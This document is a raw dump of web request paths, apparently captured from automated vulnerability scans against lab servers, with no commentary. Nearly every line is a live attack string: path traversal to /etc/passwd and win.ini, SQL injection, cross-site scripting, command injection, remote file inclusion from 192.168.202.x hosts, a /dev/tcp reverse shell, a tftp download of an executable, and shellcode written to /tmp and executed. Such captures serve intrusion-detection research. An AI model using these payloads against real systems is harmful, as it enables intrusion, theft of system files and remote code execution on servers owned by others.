/examples/servlets/servlet/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /murphy's_law/ /scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331904397 /scripts/.htaccess.save /l13b77e5.exe? /javascript/new.exe /examples/jsp/checkbox/misc/audio.php?recording=../version.inc /web-scripts/ /scripts/backend/classes.php?include_path=../lib/jinzora.js\x00 /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/swgnhpydbq0t? /javascript/tpl.exe /hjdzm96v.asp? /igtf0zon.cfm? /cacti/index.php?search='>&searchmode=f /subscriptionlanding/ /recordings/protection.php?action=logout&siteurl=/etc/passwd /ap58k3ci.php3? /top.php?stuff="ver;>q17781936&rem; /htbin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /phpmyadmin/index.php?sensor_program= /help.php?q=&ver\x09>q99913985&rem\x09 /hjdzm96v.jsp? /javascript/2012.exe /zmvq66jy.aspx? /htbin/fileseek2.cgi?foot=;cat /etc/passwd&head= /javascript/hadoop.exe /fa8p8lr8.jsp? /snpfiltered.pl?t=c&u= /esmozg5d.mscgi? /javascript/definitions.exe /nuh3zirz.aspx? /v3axg1p8.exe? /script/param/param.inc.php?path_inc=@rfiurl /tukodz3j.html? /9kr0ih0v.do? /top.php?stuff="rm,q67251581&rem, /manager/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /7u1pb2xi.cfc? /main.php?logout="rm\x0cq94269861&rem\x0c /javascript/jakarta.exe /cgi-bin/index.php?gadget=glossary&action=view&term= /1qwv2p5p.cgi? /scripts/pmwiki.php /main.php?stuff="rm\x09q42253935&rem\x09 /scripts/ui/login?user=nessus-1331904647 /encodingdescriptions/ /zmvq66jy.jspa? /cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd /examples/jsp/cal/index.php?user_langue=../../../../../../../../../../etc/passwd /examples/jsp/cal/index.php?post=../config/password /scriptorium/ /eesubscription_ps/ /search.asp?search=\"><script>alert(vulnerable)</script> /examples/jsp/jsp2/el/review.php?id=1&cat=&subcat="> /examples/jsp/num/athenareg.php?pass= ;id /main.php?stuff="|ping -w 8000 -n 1 4.3.2.1|rem /examples/jsp/checkbox/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008335','5'-- /javascript/sources.exe /examples/jsp/cal/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /main.php?logout="ping;-w;8000;-n;1;1.2.3.4|rem; /examples/jsp/jsp2/jspx/data/fetch.php?page=' /recordings/lang/index.php?file=/etc/passwd /javascript/xmlrpc.exe /j4rdyhw8.fts? /javascript/osc.exe /ybz5rz7a.do? /help.php?q='del q24159687 # /cgi-local/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /help.php?q="ver,>q11574297&rem, /cgi-bin/cvslog.cgi?file= /examples/jsp/colors/ftp/ftp.pl?dir=../../../../../../etc /l'hermitage prepare pour henry de valois/ /examples/jsp/checkbox/nessus">/ /help.php?q=';sleep\x0911\x09# ftp://192.168.27.103/* /javascript/secure.exe /main.php?stuff=&ver\x0c>q83537975&rem\x0c /mainscript/ /phpmyadmin/core/api.php?t_path_core=/etc/passwd\x00 /javascript/announcement.exe /cgibin/fileseek.cgi?foot=;cat /etc/passwd&head= /vac1l5vm.x? /help.php?q="&ver;>q11575615&rem; /help.php?q=";rm\x09q51344488\x09# /manage-subscriptions/ /examples/jsp/error/calendar.php?serverpath=/etc/passwd\x00 /argument_transcripts/ /mv8wxfy9.nsf? /examples/jsp/cal/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /javascript/anon.exe /top.php?stuff="\x0adel\x09q52122221\x09# /scripts/index.php?op=default&date=200607' union select 1,1900403573,1,1,1,1,1,1,1,1--&blogid=1 /cgi-915/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /6n7aacgg.jsp? /..\..\..\..\..\..\temp\temp.class /scriptingarchive/ /rbec2ohx.do? /sysuser/docmgr/rename.stm?name= /1passwd/ /cacti/embed/day.php?path=/etc/passwd\x00 /help.php?q="&ver\xa0>q93363383&rem\xa0 /yec'hed/ /examples/jsp/jsp2/el/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /9ko6m4c8.html? /7uz3ok60.pl? /b5xdqgz2.cfc? /index.php?config["sipssys"]=http://192.168.202.96:8080/4dckqcc0acprbz? /scripts/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /phpmyadmin/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'-- /scripts/ui/login?user=nessus-1331904328 /top.php?stuff=';rm\x09q48683432\x09# /qb2xy9aw.do? /cgi-sys/.htpasswd / /scriptomania by norouzi/ /failure.asp?err_txt=texttext /examples/jsp/jsp2/el/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /rpc/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /cgi/ppdscgi.exe /cgi-bin/phf.cgi?qalias=x\x0a/bin/cat /etc/passwd /e9rx3ya4.html? /javascript/decrypted.exe /script/ident/identification.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8? /scripts/calendar.php?month=' union select 1,1,'1332009306','calendarix_month_sql_injection.nasl',1 # /zuihld5m.exe? /top.php?stuff=\x0auname >q36414262 # /b4vng02k.idc? /search.php?zoom_query= /cgi-bin/print.php?what=article&id=' /8t9v8k7x.cfm? /scripts/productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus /cgi-bin/search.jsp?q=%" /cgi-bin/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /webdav/phprun.php?cmd=wce.exe /fulldescription/ /main.php?logout=uname\x09>q57845343\x09# /cgi-bin/index.php?module= /cgi-bin/.passwd /daddy's worst nightmare 2/ /scripts/wrap /base_local_rules.php?dir= /cgi-perl/fileseek.cgi?foot=;cat /etc/passwd&head= /oie504mr.jspa? /d44uk9h2.dll? /examples/jsp/colors/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 /examples/jsp/error/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00 /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00 /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908861,1,1,1,1,1,1,1--&blogid=1 /cgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd /en-us/i686v90l.pl? /examples/jsp/num/mapserv.exe?map=mapserver_detect.nasl.map /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+5f5+>>ctdn /newsarchive.php?path_to_script=http://cirt.net/rfiinc.txt??&cmd=ls /ny1b3qq4.php3? /vwmg565s.cfc? /cgibin/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /ht8pn8uq.php? /help.php?q='&uname # /subscriptions.sh /hrttz9fj.php3? /clockscriptlet/ /main.php?stuff="rm\x09q84368944\x09# /examples/servlets/servlet/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /ap58k3ci.cfm? /examples/jsp/jsp2/jspx/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd /htbin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /javascript/gb.exe /vac1l5vm.cfm? /main.php?logout='del\x09q24187781\x09# /lsoix5h3.php3? /u95h6ymu.html? /javascript/device.exe /javascript/htpasswd.trace /examples/jsp/error/sojourn.cgi?cat=../../../../../etc/passwd\x00 /javascript/tr.exe /search.php?searchstring= /en-us/.do /zroo33l4.php3? /main.php?logout=ver >q61134549&rem /examples/jsp/cal/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null -- /crosssitescripting/ /0u75ldxq.cgi? ..\..\..\..\..\..\..\..\..\..\boot.ini /h4bi26jd.x? /manager/includes/config.php?relative_script_path=http://xxxxxxx /scripts/syncml/index.php /test.php?evalme=eval($_server[http_x_pwzylftyuzjks]); /egaet53a.jspa? /examples/jsp/cal/index.php?id='union/**/select/**/0,0,1645029612,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /fa8p8lr8.htm? /footer.inc.php?la_pow_by= /basilix.php3?requestid=dummy&password=secu&request_id[dummy]=../../../../etc/passwd&username=sec /jw64yq8u.fts? /javascript/views.exe /xlj7h65o.exe? /phpmyadmin/includes/db_adodb.php?basedir=/etc/passwd\x00 /subscriptions.do /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1 /scripts/getpassword.php /l4fz1dqw.php? /zln2hm2z.dll? /0u75ldxq.x? /scripts/webmail.exe /modules.php?op=modload&name=guestbook&file=index&entry= /en-us/account/index.php?chemin=../../../../../../..//etc /javascript/gsm.exe /scripture_gifts/ /examples/jsp/sessions/mylog.html?screen=/etc/passwd /examples/jsp/cal/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /scripts/kfzqb5x87lvq.cgi /scripts/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /top.php?stuff=";del q25742723 # /javascript/intl.exe /i2n4v4rl.aspx? //%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd /javascript/srv.exe /help.php?q="&del q71917693&rem /? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+del+esbq /javascript/abcd.exe /scgi-bin/ion-p.exe?page=c:\winnt\repair\sam /script/ /ju0u7kfo.x? /7uz3ok60.nsf? /examples/jsp/error/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /javascript/joe.exe /m2fpztty.asp? /bmeun223.jsp? /i7prbs22.x? /scripts/rihzp7swr3p6.asp /606wkcop.kspx? /j2kdmfw4.kspx? /examples/jsp/jsp2/jspx/search.php?submit=true&search='); /lil'-pimp/ /88ss.exe/ /aj3pf49c.kspx? /nuh3zirz.asp? /javascript/beans.exe /5qnlm5z2.cfm? /uvazfs7p.cgi? /twiki/bin/view/main/twikiusers?rev=8 `0<&206-;exec 206<>/dev/tcp/192.168.202.96/22943;sh <&206 >&206 2>&206`# /javascript/excalibur.exe /yef5f3d5.html? /fa8p8lr8.nsf? /en-us/.aspx /javascript/.htpasswd.sfish/bogus\x0askipfish-inject:bogus /readmore.php?config["sipssys"]=http://192.168.202.118:8080/zz5thkvtmlgl? /fo564rei.jsp? /manager/sojourn.cgi?cat=../../../../../etc/passwd\x00 /top.php?stuff="ver&rem; /zv8tv7h8.fts? /eg2u8pbv.fts? /examples/jsp/error/hw3.cgi?daysonly=0).system('id').( /ot-scripture/ /script/fckeditor/editor/filemanager/browser/default/connectors/test.html /examples/jsp/jsp2/el/index.php?album=../../../../../../../../../../etc/passwd\x00 /examples/servlets/servlet/shopper.cgi?newpage=../../../../../../etc/passwd /do_inscript1/ /examples/jsp/colors/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /d5a5renl.cfc? /awstats/awstats.pl?migrate=|echo;/bin/echo -en "h\0300\0250\0312fh\0002\0000\0307\0203\0211\0340j\0020pr" >> /tmp/gjehhrjnrx0;echo|awstats769839.txt /npasswd/ /yef5f3d5.exe? /mailarticle.php?id='union select 0,0,0,0,0,0,username,password,0,0,0,0,0,0,0,0,0 from cc_admin/* /3hlysl2x.php? /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 438328228-- /examples/jsp/checkbox/tinybrowser/upload.php?badfiles=1> /cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /phpmyadmin/search.php?searchstring= /en-us/i686v90l.kspx? /script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/ghl9il? /scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il?? /bn857frh.php? /examples/jsp/jsp2/jspx/core/editor.php?editor_insert_bottom=/etc/passwd /scripts/nckowqpd4zng.inc /internal.sws?../../../../../../../../winnt/win.ini /scripts/ggvfa_wichxq.inc /cgi-bin/dbmlparser.exe /0qhcnefz.jsp? /javascript/document.phtml /javascript/crm.exe /main.php?stuff="rm\xa0q63696925&rem\xa0 /cacti/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /169okeyj.htm? /u8yiqilu.asp? /includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl /././././././../../../../../etc/passwd /e9rx3ya4.cfm? /cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd /xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/fun.exe /examples/jsp/jsp2/jspx/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /main.php?stuff=&ver;>q39916466&rem; /b5xdqgz2.kspx? /javascript/link.exe /javascript/donate.exe /scripts/6gl21a1hiz3s.cgi /recordings/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /javascript/sql.exe /pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\x00 /? /zuihld5m.x? /scripts/buoalakxhatu.shtml /jujgxwav.asp? /examples/jsp/errorsearch_results.dot?search_query=nessus">/ /examples/jsp/num/sgdynamo.exe?htname= /en-us/.cfc /recordings/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /help.php?q="rm\x0cq43893615&rem\x0c /examples/jsp/jsp2/el/index.php?show=/etc/passwd /j4drbkil.php3? /main.php?stuff="ping\x09-w\x099000\x09-n\x091\x091.2.3.4|rem\x09 /cgi-bin/shoutbox.php?conf=../ /help.php?q="ping,-w,8000,-n,1,4.3.2.1|rem, /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331905170 /phpmyadmin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200 /javascript/.passwd.trace /d5a5renl.pl? /outreach.exe /scripts/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /apavxugx.php? /javascript/.htaccess/'" /cgi-bin/fileseek2.cgi?foot=&head=;cat /etc/passwd| /h5i6crm3.jsp? /en-us/account/port.php?proto=tcp' /j4rdyhw8.idc? /cgi-bin/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass= /g3w7y7u5.cfc? /examples/jsp/jsp2/jspx/includes/db_adodb.php?basedir=/etc/passwd\x00 /phpmyadmin/index.php?template=../../../loudblog/custom/config.php\x00 /help.php?q=&uname >q52514762 # /manager/catalog.php?action=category_show&id=' /javascript/snoop.exe /webcgi/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /main.php?stuff=';uname >q74863224 # /phpmyadmin/minis.php?month=../../../../../../etc/passwd /cacti/more.php?id=1' /169okeyj.dll? /base_local_rules.php?dir= /javascript/_private.exe /language.php?data_dir=/etc/passwd\x00 /scripts/index.pl /phpmyadmin/forumdisplay.php?fid=21"> /cgi-bin/ssi//../../../../../../../etc/passwd /examples/jsp/error/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 /javascript/foto.exe /606wkcop.jspa? /examples/jsp/colors/shared/help.php?page=../../../../../../../../../../etc/passwd\x00 /main.php?logout=;sleep\x0911\x09# /cgi-bin/index.php?id=egyb16sayu' /examples/jsp/sessions/search.php?searchstring= /phpnews130-xss/ /eg2u8pbv.jspa? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/bxtfwlgmsj0+>+/dev/null+&')."]=1 / /t3af3tdz.php? /javascript/.htpasswd.sfish/`uname` /cacti/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /top.php?stuff="&del\x09q38641956\x09# /qczkquis.do? /en-us/w4996nr0.kspx? /ap58k3ci.do? /7u1pb2xi.cfc? /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00 /w4996nr0.x? /nuh3zirz.exe? /? /help.php?q="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /scripts/index.php?option=frontpage&itemid=2|system(id)|1331904438 /examples/jsp/jsp2/jspx/js/scripts.php?load=/etc/passwd\x00 /scripts/faq.php?action=&type=view&s=&id=-1' union select 0,359553433,0,0,0,0,0-- /javascript/document.class /esmozg5d.jspa? /help.php?q="ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /sysuser/docmgr/ftp.stm?path= /examples/jsp/colors/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /examples/jsp/sessions/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd /examples/jsp/error/phf?qalias=x\x0a/bin/cat /etc/passwd /main.php?stuff="ping -w 11000 -n 1 4.3.2.1|rem / /scripts/index.php?option=frontpage&itemid=2|system(id)|1331919001 /javascript/resolve.exe /jnt3f86c.do? /main.php?logout="\x0auname\x09>q94356566\x09# /examples/jsp/colors/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /examples/jsp/num/profil.php?id=1 /examples/jsp/num/download.php?language=/etc/passwd\x00 /n1afe1y6.jspa? /en-us/7o5qp766.pl? /iv5vkgam.jsp? /t578vqea.pl? /forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd\x00 /scripts/gdxlwjnlsr6i.cgi /fc9t54l7.cfc? /c:\system32\cmd.exe /examples/jsp/colors/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00 /o6ebbirj.dll? /gy23xnjq.jspa? /help.php?q='\x0ddel q58812882 # /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331909358 /l13b77e5.do? /zroo33l4.pl? /scripts-r0/ /606wkcop.aspx? /examples/jsp/jsp2/jspx/base_local_rules.php?dir= /help.php?q=;uname >q31144684 # /t578vqea.php? /raptor_passwd/ /examples/jsp/checkbox/ftp/ftp.pl?dir=../../../../../../etc /en-us/33y9gcqq.cfc? /cgi-bin/test.bat?|dir ..\\..\\..\\..\\..\\..\\..\\..\\..\\ /script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/2aibfaczmac8? /scripts/d3z7yywpyeoa.shtml /scripts/admin/o12guest.mdb /cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file¤tfolder=/bck.jsp\x00 /n9xlumt5.aspx? /dslpwt15.php? /top.php?stuff="&rm\x09q26831864\x09# /examples/jsp/checkbox/index.php?cid=' /scriptablefields/ /azcrfs8d.htm? /help.php?q="rm\x0bq49522765&rem\x0b /examples/jsp/jsp2/el/ftp/ftp.pl?dir=../../../../../../etc /b1q8bywu.idc? /cacti/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349 /scripts/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd /main.php?frm_daynight=q33918212&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width= / /main.php?stuff=';del\x09q26313493\x09# /bzuf9ozq.htm? /examples/jsp/cal/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /cgi-bin/cgi-test.exe /javascript/push.exe /script/gestion/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? / /g8nu2yy7.jsp? /ttxssh2_100alpha2/ /s7qus4g3.php3? /scripts/bpk_bsfe_4vq.cgi /top.php?stuff="|ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /iisadmpwd/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og /script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? /7dbjwpw6.htm? /scripts/login_page.php /help.php?q="ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /examples/jsp/cal/index.php?include_files[]=&include_files[query_string]=/etc/passwd //

/miz4r5hz.htm? /examples/jsp/colors/sendtemp.pl?templ=../../../../../etc/passwd /help.php?q="&del,q17457396&rem, /shell-scripts/ /cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /examples/jsp/num/showproduct.php?product=1' /javascript/realestate.exe /zmvq66jy.php? /javascript/coldfusion.exe /help.php?q="|ping\x0b-w\x0b11000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b /weq93ppb.idc? /scripts/4rzefq7dsowk.php3 /prxdocs/misc/prxrch.idq?citemplate=../../../../../../../../../../winnt/win.ini /scripts/index.php?id=0rop9yeuxw' /606wkcop.cfm? /phpmyadmin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /egaet53a.cgi? /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd /cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,122468218,0,0,0,0,0-- /examples/jsp/error/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /help.php?q='\x0adel q56533456 # /lmw4r201.fts? /examples/servlets/servlet/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /phpmyadmin/phpnews/sendtofriend.php?mid='1' /iv5vkgam.php? /help.php?q='\x0auname\x09>q61575727\x09# /examples/jsp/colors/kb.cgi?view='&lang=en /javascript/fbook.exe /javascript/personal.exe /nessus">/ /fa8p8lr8.cfc? /awstats/awstats.pl?migrate=|echo;/./tmp/qcywjpzuja0 > /dev/null &;echo|awstats668269.txt /main.php?stuff="&ver >q89179194&rem /pxagj7n7.php3? /javascript/.htpasswd.sfish/skipfish~string /7u1pb2xi.jspa? /en-us/h5sc3gxy.cfm? /yver8r9o.cfc? /aj3pf49c.exe? /en-us/fo564rei.kspx? /recordings/includes/db_adodb.php?basedir=/etc/passwd\x00 /ao22ww7y.php? /nsn/..\util/chkvol.bas /scripts/awstats.cgi /cgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /cfide/scripts/ajax/fckeditor/ // /i7prbs22.idc? /1qwv2p5p.htm? /main.php?logout="\x0ddel q33212666 # /82q7ywa8.php? /javascript/.htpasswd.sfish///skipfish.invalid/;? /pxagj7n7.cfc? /examples/jsp/num/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /opendir.php?/etc/passwd /n9xlumt5.mscgi? /rbec2ohx.cfc? / /docs/ / /manager/awstatstotals.php?sort="].passthru('id').exit().$a[" /printsubscriptions/ /examples/jsp/sessions/forum_2.php?msg=10&return= /vwmg565s.asp? /examples/jsp/jsp2/el/mylog.html?screen=/etc/passwd /scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/2aibfaczmac8? //a="%3cscript%20src=%27http://www.example.com/test?rnd=q31137192%27%3e%3c%2fscript%3e";document.writeln(unescape(a)) /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- //

/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010410',null,null,null,null -- /msagent-vbscript/ /examples/jsp/sessions/whois.cgi?action=load&whois=;id /scripts/roschedule.php /0u75ldxq.html? /main.php?stuff="&ver\x0b>q72441193&rem\x0b /33y9gcqq.asp? /tuwjta1w.php? /scripts/prnnucptkixl.html /examples/jsp/jsp2/el/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /main.php?stuff="\x0ddel\x09q27469451\x09# /gy23xnjq.exe? /cgi-bin/cal_week.php?op=week&catview=999' /javascript/standards.exe /scripts/irbf6nj7oyfh.cfm /d7ktpmcq.php? /javascript/appl.exe /a0imiuf1.mscgi? /contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /cgibin/a1disp3.cgi?../../../../../../../../../../etc/passwd /vmi8bb12.php? /examples/jsp/error/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /recordings/faxsurvey?cat /etc/passwd /javascript/document.ppt /phpmyadmin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /javascript/seed.exe /javascript/d.exe /cgi-sys/gw5/gwweb.exe?help=bad-request /examples/jsp/cal/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /htpasswd/ /examples/jsp/jsp2/jspx/survey.inc.php?path=/etc/passwd\x00 /en-us/account/simple/view_page?mv_arg=|cat /etc/passwd| /scripts/cal_week.php?op=week&catview=999' /main.php?logout="&rm q83422114 # /javascript/manifest.mf.exe /logo's fabrikanten/ /examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00 /examples/jsp/colors/listrec.pl?app=qmh-news&template=;ls /etc| /m2fpztty.cfc? /script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /scripts/pssdseehtgdp.php3 /scripts/wd7crx47eaml.php /v3axg1p8.idc? /scripts/whois.php?query=|id /examples/jsp/jsp2/el/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl /phpmyadmin/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /main.php?logout="&ver >q52615858&rem /ygkjkngd.idc? /top.php?stuff=;uname # /recordings/includes/config.php?relative_script_path=http://xxxxxxx /help.php?q="|ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /xoops_lib/modules/protector/notification.php?mydirname=a(){}echo(md5('xoops_2_3_2brce'));function+v /htbin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /en-us/h5sc3gxy.kspx? /if69ddo1.exe? /bin/gw5/gwweb.exe?htmlver=aaa&get-context /member/usercp_menu.php?script_folder=http://192.168.202.118:8080/ghl9il? /5o9zq43e.php? /javascript/1992.exe /ydexw8by.php3? /main.php?stuff="|ping,-w,7000,-n,1,4.3.2.1|rem, /add.php3?url=ja&adurl=javascript: /top.php?stuff="&rm,q38169729&rem, /main.php?logout=\x0duname >q42999467 # /main.php?stuff="&ping\xa0-w\xa08000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /cgi-home/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /0w155a7c.dll? /examples/jsp/colors/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /examples/jsp/num/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /scripts/starnet/addons/slideshow_full.php?album_name='1840670444 /eg2u8pbv.aspx? /scripts/db_input.php /en-us/.kspx /aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc= /ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/iroy1gvqrrqu?' /top.php?stuff=&uname >q42552299 # /odzk29aa.do? /scripts/8obtsg.exe?/x+/c+tftp -i 192.168.202.118 get nzbobuyh pnrwmkim.exe /shoutbox.php?conf=../../../../../../../etc/passwd /scripts/b0j2ijssh6cu.inc /azcrfs8d.php? /33y9gcqq.jspa? /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908727 /en-us/ /javascript/htpasswd.yml /cgi-win/gwweb.exe?help=bad-request /scripts/admin.asp /oie504mr.jsp? /d765w06j.idc? /././././././../../../../../windows/win.ini / /index.php?page=../../../../../../../../../../../../../../../etc/passwd /scripts/logs/hcdiskquotaservice.csv /recordings/index.php?gadget=glossary&action=viewterm&term= /javascript/balance.exe /jdx255ea.php? /z'terminator_1/ /examples/servlets/servlet/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_h0jv924_]));die;/* /javascript/msadc.exe /0rufe52p.nsf? /vac1l5vm.php3? /uc3w3bdi.html? /javascript/ubuntu.exe /5o9zq43e.nsf? /scripts/cxvae_g3rjys.cfm /ywaxntrx.jspa? /init.php?scriptpath=http://cirt.net/rfiinc.txt?? /scripts/qg9h0c0svvat.html /main.php?logout=rm;q21667624&rem; /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+50+6a+0c+e8+0c+00+00+00+50+8d+5d+27+53+ff+d0+91+5a+5f+eb+6b+60+89+e5+60+31++>>ctdn /scripts/u7m5ok8eqpfy.php /gstranscripts/ /fo564rei.php? /examples/servlets/servlet/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ /javascript/license.exe /zln2hm2z.kspx? /main.php?logout="rm q68212743 # /help.php?q='\x0duname >q49373567 # /main.php?stuff="uname >q55141299 # /scripts/fxm.exe /cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1607725405,0,0,0,0,0-- /examples/jsp/colors/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/2aibfaczmac8?&cmd=cat/etc/passwd /help.php?q=ping;-w;7000;-n;1;4.3.2.1&rem; /phpmyadmin/index.php?search=&function=search /help.php?q=\x0duname >q13423853 # 